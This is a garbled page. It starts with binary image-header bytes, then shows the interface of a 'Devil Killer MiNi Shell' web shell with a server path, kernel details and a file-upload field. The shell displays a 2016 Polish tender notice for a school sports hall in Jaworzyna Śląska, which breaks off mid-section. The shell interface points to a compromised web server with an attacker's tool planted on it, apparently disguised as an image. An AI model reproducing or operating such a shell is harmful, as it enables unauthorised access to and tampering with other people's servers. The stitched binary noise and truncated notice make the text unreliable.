JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160913/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160913/308138-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 308138 - 2016
              z dnia 2016-09-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jaworzyna Śląska: Budowa pełnowymiarowej sali sportowej i edukacyjnej przy Gimnazjum Nr 1 w Jaworzynie Śląskiej<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Regionalny Program Operacyjny Województwa Dolnośląskiego 2014-2020 współfinansowany ze środków Unii Europejskiej, Europejskiego Funduszu Rozwoju Regionalnego RPO WD 2014-2010 ZIT AW oraz środki z Ministerstwa Sportu i Turystyki w ramach programu rozwoju regionalnej infrastruktury sportowej 2016</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Jaworzyna Śląska, krajowy numer identyfikacyjny
              88423652030000, ul.
              ul. Wolności 
              9,
              58140  
              Jaworzyna Śląska, woj.
              dolnośląskie, państwo
              , tel.
              748 588 230, e-mail
              urzad@jaworzyna.net, faks
              748 588 253.
              <br />
              Adres strony internetowej (URL): www.bip.jaworzyna.net <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.jaworzyna.net  -przetargi</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa pełnowymiarowej sali sportowej i edukacyjnej przy Gimnazjum Nr 1 w Jaworzynie Śląskiej<br /><b>Numer referencyjny: </b>IGK.271.2.16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>II. Tryb udzielenia zamówienia.
1.Zamawiający udziela w oparciu o Ustawę z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. z 2015r. poz. 2164 nowelizacja po 28 lipca 2016. Zwaną dalej ustawą Pzp, ogłasza zamówienie publiczne na roboty budowlane w trybie  przetargu nieograniczonego zgodnie z art.39 Pzp. 
Przez skrót specyfikacja, SIWZ należy rozumieć niniejszą Specyfikację Istotnych Warunków Zamówienia.
2.Wartość zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy. Niniejsze zamówienie nie przekracza kwoty 5 225 000,00 euro dla robót budowlanych.

III. Opis przedmiotu zamówienia.
1. Przedmiotem zamówienia jest Budowa pełnowymiarowej sali sportowej i edukacyjnej przy Gimnazjum Nr 1 w Jaworzynie Śląskiej, wraz z pełnym zagospodarowaniem terenu t.j.: 
- ciągi komunikacyjne piesze i jezdne oraz parkingi,  
- zjazd na działkę nr ew. 570 z ul. Świdnickiej,  
- wykonanie nowego systemowego ogrodzenia panelowego z prętów stalowych ocynkowanych malowanych proszkowo z prefabrykowanym cokołem o wysokości min 170cm, 
- elementy małej architektury (kosze na śmieci, stojaki na rowery itp.), 
- zieleń (drzewa liściaste i iglaste, trawniki), 
- instalacje zewnętrzne (projektowana kanalizacja deszczowa, projektowana kanalizacja sanitarna, projektowane przyłącze wodociągowe, projektowane słupy oświetleniowe, istniejący wodociąg do likwidacji), 
- oraz wyposażeniem w osprzęt sportowy t.j. między innymi: gniazda do słupków do siatkówki i bramek do piłki ręcznej, słupki z siatką do siatkówki, bramki do piłki ręcznej, elektrycznie opuszczane i podnoszone kosze do piłki koszykowej kotwione w dźwigarach konstrukcji dachu, elektrycznie rozsuwane przegrody kurtynowe podwieszone do dźwigara konstrukcji dachu, 2 szt. uniwersalnych tablic wyników sterowanych z pilota i konsoli, kompletne nagłośnienie sali sportowej ze wzmacniaczem, mikserem i min 2 szt. mikrofonów bezprzewodowych, osprzęt trybun sportowych, kompletny kort do gry w squash (parametry techniczne pkt. III.6). 

Projektowana sala sportowa to obiekt dwukondygnacyjny, niepodpiwniczony zaprojektowany na planie zbliżonym do prostokąta. Budynek sali jest dwukondygnacyjny, niepodpiwniczony  pomieszczenie Sali sportowej jest jednopiętrowe. Wysokość całkowita budynku 12,77m powyżej poziomu terenu. 
Część obiektu z salą sportową zaprojektowano w monolitycznej konstrukcji szkieletowej, przykrytej dachem z drewna klejonego, z murowanymi ścianami  w konstrukcji tradycyjnej (cegła ceramiczna kratowa - układana na zaprawach ciepłochronnych - mury jednowarstwowe). 

Zaplecze zaprojektowano w konstrukcji tradycyjnej z murowanymi ścianami i wewnętrznymi wzmacnianymi rdzeniami żelbetowymi, przykrytą prefabrykowanym stropem gęsto żebrowym i strunobetonowym stropem kanałowym. Stropy nad piętrem pełnią funkcję stropodachu. 

W obiekcie znajdują się cztery żelbetowe klatki schodowe.

Dach dwuspadowy łukowy, którego głównym elementem nośnym są jednoprzęsłowe dźwigary z drewna klejonego, zamocowane na słupach w osiach podłużnych 5 i 23. 

Pokrycie dachowe z papy termozgrzewalnej z izolacją z wełny mineralnej twardej gr. 25cm, na blasze trapezowej. 

2. Przed złożeniem oferty Oferent ZOBOWIĄZANY jest dokonać wizji lokalnej i zapoznać się z terenem związanym z wykonaniem zamówienia, a także całą dokumentacją techniczną załączoną w niniejszym SIWZ (szczegółowy zakres robót stanowiący przedmiot zamówienia określony jest w przedmiarze robót, projekcie technicznym i wykonawczym, specyfikacji technicznej wykonywania i odbioru robót budowlanych).
Wszelkie zapytania w sprawie wyjaśnienia specyfikacji istotnych warunków zamówienia należy kierować na piśmie do osób uprawnionych do kontaktu z oferentem.

Wizji lokalnej dokonuje Oferent na koszt własny. 
Zamawiający nie posiada dokumentu inwentaryzacji robót wykonanych.

3. Przy wykonywaniu oferty na budowę sali sportowej nie należy kalkulować wykonania  robót ziemnych (samych wykopów), oraz  ław i stóp fundamentowych, ponieważ zostały one wykonane w okresie wcześniejszym. 
Natomiast należy skalkulować m.in:
 odkopanie zasypanych ław fundamentowych, stóp fundamentowych oraz  ścian fundamentowych,
 wykonanie izolacji powłokowych na bazie dyspersji wodnych 2 x grunt + 2 x izolacja właściwa ław fundamentowych, stóp fundamentowych, oraz ścian fundamentowych,
 zasypanie ław fundamentowych po obwodzie zewnętrznym,
 dokonać lokalnych napraw ścian fundamentowych w miejscach zarysowań lub pęknięć poprzez sklamrowanie t.j. wklejanie prętów stalowych klejami chemicznymi,
 dokonać lokalnych uzupełnień wyciętych prętów, kotwiących zbrojenia słupów poprzez wklejenie prętów o tych samych średnicach stosując metodę HILTI HIT.
 usunąć z przestrzeni wewnętrznych pomiędzy ścianami fundamentowymi sali sportowej i zaplecza roślinność biologiczną (tj. samosiejki, krzewy, trawy i chwasty).
 uzupełnić zasypki pomiędzy ścianami fundamentowymi z pospółki lub mieszanek kamiennych zagęszczanych warstwami do stopnia zagęszczenia Id  0,97- zgodnie z opisem architektonicznym.

4. Charakterystyczne parametry techniczne 
Powierzchnia zabudowy 2528,60m2 
Powierzchnia użytkowa  3019,10m2
Kubatura 21409,00m3
Projektowany poziom parteru +/- 0,00= 233,10m n. p. m
Wysokość budynku 12,77m
Wymiary budynku 64,58m x 43,69m
Liczba kondygnacji 2 

5. Wykładzina:
5.a Charakterystyczne parametry techniczne wykładziny sportowej

W Sali sportowej zaprojektowano posadzkę sportową punktowo elastyczną z rolowaną wielowarstwową wykładziną sportową PCV 7mm  montowaną bezpośrednio do podłoża betonowego.
Wszelkie aspekty techniczne takie jak: przygotowanie podłoża betonowego, mocowania do podłoża wykonać ściśle według wytycznych wykonawcy i zgodnie ze sztuką budowlaną, w sposób zapewniający udzielenie gwarancji na podłogę sportową przez wykonawcę co najmniej 5 lat.
Właściwości:
-Wielowarstwowa nawierzchnia sportowa o min. grubości 7 mm.
- Zabezpieczona powierzchniowo, fabrycznie systemem zabezpieczania powierzchni, nie wymagającym żadnych dodatkowych powłok ochronnych przez cały okres użytkowania, Dzięki swojej konstrukcji, przeciwdziała również poślizgom. Jest odporny na działanie bakterii i chemikaliów, łatwy w utrzymaniu czystości
- Zawiera ochronę antybakteryjną i przeciwgrzybiczną 
- Z warstwą użytkową z kalandrowanego PCV o min. grubości 2,1mm
- W środku wzmocniona / zbrojona podwójną siatką z włókna szklanego gwarantująca wielofunkcyjność wykładziny 
- Łączona za pomocą sznura o gr. 5 mm (spawanie metodą obróbki termicznej)


Właściwości techniczne:
	Grubość całkowita: 7mm
	Warstwa użytkowa ( PCV) grubość min. 2,1 mm
	Warstwa spodnia (sprężysta ) z pianki PCV - 4,9 mm
	Waga  4,6 kg/m2
	Ognioodporność- min. Cfl s1 (wg. EN 13 501-1)
	Klasa formaldehydów  E1
	Zawartość pentachlorofenu (PCP)  brak zawartości
	Odporność na zarysowania, ścieranie   350mg (wg. EN ISO 5470-1)
	Emisja lotnych związków organicznych po 28 dniach  &lt;100 g/ m3 (ISO 16000-6)
	Odporność na uderzenia  8 N.m (EN 1517)
	Odporność na wgniecenia -  0,5 mm (EN 1516)

Właściwości sportowe:
	Pionowe odbicie piłki   90% ( wg. EN 12 235)
	Odporność na poślizg (wskaźnik przesuwania)  min. 105 (wg. EN 13 036-4)
	Amortyzacja wstrząsów  min. 32% (Grupa P1) (wg. EN 14 808)

Certyfikaty do specyfikacji:
	Atest Higieniczny PZH 
	Deklaracja Właściwości Użytkowych 
	Certyfikat IHF (Międzynarodowego Związku Piłki Ręcznej)
	Certyfikat EHF (Europejskiego Związku Piłki Ręcznej)
	Certyfikat FIBA  (Międzynarodowego Związku Piłki Koszykowej)
	Certyfikat FIVB APPROVED Official Supplier  (Międzynarodowego Związku Piłki Siatkowej)
	Autoryzacja Producenta Wykładziny dla Wykonawcy na przedmiotową inwestycję
	Karta Techniczna Wykładziny 

5.b Wykładzina zabezpieczająca

W Sali sportowej przewidziano dostarczenie rozwijanej na czas imprez pozasportowych podłogi kauczukowej o wymiarach 37,5 x 20 m (przedmiar robót poz. 175). W związku z dużą powierzchnią, konieczne jest dostarczenie wózka do rozwijania i transportu w/w wykładziny, wyposażonego w koła umożliwiające bezpieczne poruszanie się po wykładzinie sportowej (opis pkt III. 5a) bez ryzyka jej uszkodzenia.

6. Charakterystyczne parametry techniczne kortu do squash-a
6.1 Każdy element kortu squash-a musi posiadać certyfikat WSF (World Squash Federation).
6.2 Panelowe ściany boczne i frontowe kortu muszą być połączone punktowo metalowymi kotwami na dystans ze ścianami budynku. Niedopuszczalne jest mocowanie paneli ściennych do ściany budynku za pomocą stelaża (drewnianego, metalowego lub innego typu).
6.3 Do budowy ścian frontowych kortów należy zastosować 3 panele o długości nie mniejszej niż 640 cm i maksymalnej grubości 18 mm.
6.4 Przestrzeń między panelami ścian bocznych i frontowych kortów, a ścianami budynku musi być wypełniona suszonym ogniowo piaskiem kwarcowym 1-4mm w ilości, co najmniej1500 kg (każda ściana).
6.5 Ściany frontowe i boczne kortu nie mogą po montażu posiadać widocznych fug między panelami, muszą gwarantować jednakowe zachowanie piłki przy odbiciu, muszą być odporne na uderzenie piłki i rakiety, muszą posiadać możliwość zmywania śladów pozostawionych przez piłkę.
6.6 Podłoga sportowa w korcie musi posiadać certyfikat WSF i wys. 7cm. Panele wierzchnie muszą umożliwiać wchłanianie potu i muszą posiadać specjalny szlif przeznaczony dla podłóg squash. Panele wierzchnie w kolorze jasnym muszą być fabrycznie głęboko impregnowane i odporne na działanie promieniowania UV. Szpary dylatacyjne pomiędzy podłogą sportową, a ścianami bocznymi pomieszczenia należy wykonać pod panelami ścian bocznych tak, aby nie były widoczne dla użytkowników kortu.
Podłoga sportowa  całkowita wysokość 70mm. Poszczególne warstwy:
a) folia PU
b) podkładki wyrównujące
c) poduszki amortyzujące (granulat gumowy) wys. 18mm
d) legary wzdłużne jodła wymiary: 4000 x 95 x 15mm
e) ślepa podłoga jodła wymiary: 4000 x 95 x 15mm
f) folia PU
g) parkiet jesion (czterokrotnie klejone panele głęboko impregnowane odporne na promienie UV, posiadające szlif przeznaczony do gry w squash) wymiary: 2.200 x 139 x 15,6mm
6.7 Ściana tylna kortu musi być wykonana z bezpiecznego szkła SEKURIT o grubości 12mm. Konstrukcję szklanej ściany muszą stanowić profile aluminiowe o szerokości 17cm. Górny profil musi posiadać zintegrowaną, aluminiową wklęsłą linię autu.
6.8 Zamek drzwi wejściowych kortu nie może posiadać mechanizmu sprężynowego.
6.9 Linie autu na ścianie frontowej, na ścianie tylnej szklanej i na ścianach bocznych kortu muszą być wykonane z aluminiowych wklęsłych profili gwarantujących łatwą ocenę trafienia piłki w aut.
6.10 Dolna blacha autu (TIN) musi być wykonana z aluminium i musi posiadać możliwość regulowania wysokości w zakresie 430mm-480mm i nie może posiadać szczeliny między podłogą sportową, w której mogłaby pozostawać piłka podczas gry. TIN musi posiadać certyfikat WSF (Word Squash Federation)
6.11 Minimalne okresy gwarancji:
a.	60 miesiące na podłogę sportową
b.	60 miesięcy na pozostałe elementy kortu squash-a
6.12 Wymiar kortu do squash-a zgodny z wytycznymi WSF tj. 6400 x 9750 x 5640mm.
6.13 Kolorystyka kortu do ustalenia z Zamawiającym. 
7. Ze względu na dwa odrębne źródła dofinansowania całość budynku wraz z załączoną dokumentacją podzielono na część sportową  i edukacyjną. 

8. UWAGA, Zamieszczone w dokumentacjach projektowych, specyfikacjach technicznych, przedmiarze robót lub innych dokumentach wymienione nazwy producentów użyto jedynie w celu przykładowym. Wszędzie gdzie są one wskazane, należy czytać w ten sposób, że towarzyszy im określenie lub równoważne. Przez pojęcie lub równoważne tzn. że użyte materiały, urządzenia itp. będą posiadały (charakteryzowały się) wszystkimi parametrami nie gorszymi niż opisane w w/w dokumentach. Wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. Ciężar udowodnienia równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy (art.30 ust.5 ustawy Prawo zamówień publicznych). W przypadku wątpliwości dotyczących równoważności oferowanych produktów zamawiający wezwie Wykonawcę do złożenia we wskazanym terminie wyjaśnień dotyczących treści oferty. Zamawiający rozumie oferowanie materiałów gwarantujących realizację zadania w zgodzie z wydanym pozwoleniem na budowę oraz zapewniających uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. 
9. Za roboty objęte kosztorysami ofertowymi , a niewykonane przez Wykonawcę nie będzie przysługiwało wynagrodzenie. 

10. UWAGA! Dodatkowe wymagania związane z realizacją zamówienia klauzula społeczna. Wykonawca zobowiązuje się, że personel realizujący zamówienie będzie w okresie trwania umowy zatrudniony na podstawie Umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974r.  Kodeks pracy (Dz.U. z 2014r., poz. 1502 z późn. Zm.), przy czym 20 pracowników zatrudnionych będzie w wymiarze pełnego etatu. Wykonawca na etapie badania oraz w czasie realizacji umowy będzie zobowiązany udostępniać dokumenty, oświadczenia na wniosek Zamawiającego.

11. UWAGA! Oferent  zobowiązany jest w ramach realizowanego zadania do: 
1)	Zabezpieczenia placu budowy odpowiednim ogrodzeniem oraz oświetlenia i oznakowania zgodnie z obowiązującymi przepisami 
2)	Zapewnienia dojazdu sprzętu budowlanego na plac budowy, odpowiednio oznakowanego
3)	Co miesięcznego dokumentowania fotograficznego przekazywanego na płycie CD/DVD, lub innej formie ustalonej z Zamawiającym
4)	Zlecenie na koszt Wykonawcy opracowania przez uprawnione osoby Instrukcji Bezpieczeństwa Przeciwpożarowego, wraz z oznakowaniem ewakuacyjnym i dobranym sprzętem p.poż., zgodnie z obowiązującymi przepisami dla całego obiektu (budowany budynek, dojazd i parking) oraz wyposażenie obiektu w sprzęt przeciwpożarowy.
5)	Przygotowanie przez Wykonawcę wszystkich dokumentów, niezbędnych do uzyskania pozwolenia na użytkowanie, złożenie w/w dokumentów w Powiatowym Inspektoracie Nadzoru Budowlanego w Świdnicy, wraz z uzyskaniem pozwolenia na użytkowanie.
6)	Prowadzenia robót bez zakłócania kontaktów międzyludzkich.
7)	Opracowania  szczegółowego harmonogramu rzeczowo- terminowo- finansowego z podziałem na miesiące i zaakceptowanie go przez Zamawiającego.
8)	Uporządkowania terenu objętego inwestycją po zakończeniu prac i przekazanie go Zamawiającemu najpóźniej do dnia odbioru końcowego, w przypadku zniszczenia lub uszkodzenia istniejącej infrastruktury w toku realizacji  naprawienia jej i doprowadzenie do stanu pierwotnego.
9)	Wykonania pomiarów, prób i sprawdzeń wszystkich wykonanych instalacji i urządzeń potwierdzonych przez inspektorów nadzoru inwestorskiego
10)	Przeprowadzenia wszystkich  niezbędnych odbiorów i uzgodnień, w tym uzyskanie pozytywnego badania wody ( wykonywania badania aż do skutku), odbioru kotłowni przez Dozór Techniczny, oraz uzyskania pozwolenia na użytkowanie
11)	Opracowania świadectwa energetycznego
12)	Opracowania szczegółowej dokumentacji powykonawczej w tym kosztorysowej w  3 egzemplarzach zgodnie z obowiązującymi przepisami prawnymi, 
13)	Dokonania uzgodnień, uzyskania wszelkich opinii niezbędnych do wykonania przedmiotu umowy i przekazania go do użytku,
14)	Zapewnienia dozoru, a także właściwych warunków bezpieczeństwa i higieny pracy,
15)	Umożliwienia wstępu na teren budowy pracownikom organu nadzoru budowlanego
i pracownikom jednostek sprawujących funkcje kontrolne, oraz uprawnionym przedstawicielom Zamawiającego,
16)	Przeszkolenie osób wskazanych przez Zamawiającego w zakresie obsługi zamontowanych urządzeń,
17)	Poniesienia kosztów zużytej energii elektrycznej, oraz wody według wskazań liczników.
<br /><br /><b>II.5) Główny kod CPV: </b>45212222-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              7252857.86<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/08/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
